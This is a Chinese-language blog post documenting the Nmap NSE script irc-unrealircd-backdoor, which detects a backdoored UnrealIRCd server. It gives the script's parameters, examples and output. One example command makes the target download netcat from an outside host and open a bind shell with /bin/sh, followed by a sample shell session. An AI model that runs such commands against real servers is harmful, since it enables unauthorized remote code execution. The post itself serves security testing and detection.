top of page
作家相片Samuel

Nmap NSE Category vulns Script:irc-unrealircd-backdoor 檢查 IRC 伺服器是否被植入後門

已更新:8月26日


Nmap Script指令摘要


檢查 IRC 伺服器是否被植入後門,方法是執行基於時間的命令(ping)並檢查響應時間。

irc-unrealircd-backdoor.command 腳本參數可以用來在遠端系統上執行任意命令。由於這種漏洞的特性(命令的輸出永遠不會返回),我們無法獲得命令的輸出。然而,它可以用來啟動 netcat 監聽器,如下所示:

$ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
  $ ncat -vv localhost 4444
  Ncat: Version 5.30BETA1 ( https://nmap.org/ncat )
  Ncat: Connected to 127.0.0.1:4444.
  pwd
  /home/ron/downloads/Unreal3.2-bad
  whoami
  ron

Metasploit 也可用於利用這個漏洞。

除了執行任意命令外,還可以傳遞 irc-unrealircd-backdoor.kill 腳本參數,該參數僅用於終止 UnrealIRCd 進程。


參考資料:


Nmap Script指令參數


irc-unrealircd-backdoor.kill

如果設置為 1 或 true,則終止運行中的被後門感染的 UnrealIRCd。

irc-unrealircd-backdoor.wait

在執行檢查前等待的時間(秒)。建議設置這個參數以進行更可靠的檢查(100 是一個好值)。

irc-unrealircd-backdoor.command

在遠端系統上運行的任意命令(注意,您將看不到命令的輸出)。即使主機不易受攻擊,也將始終嘗試這種方法。模式 %IP% 將被替換為目標主機的 IP 地址。


Nmap Script指令範例


nmap -sV --script=irc-unrealircd-backdoor <target>

Nmap Script指令輸出

PORT     STATE SERVICE
6667/tcp open  irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Nmap Script作者:

Vlatko Kosturjak Ron Bowes

License: Same as Nmap--See https://nmap.org/book/man-legal.html



Nmap
Nmap

 

延伸閱讀


0 次查看
bottom of page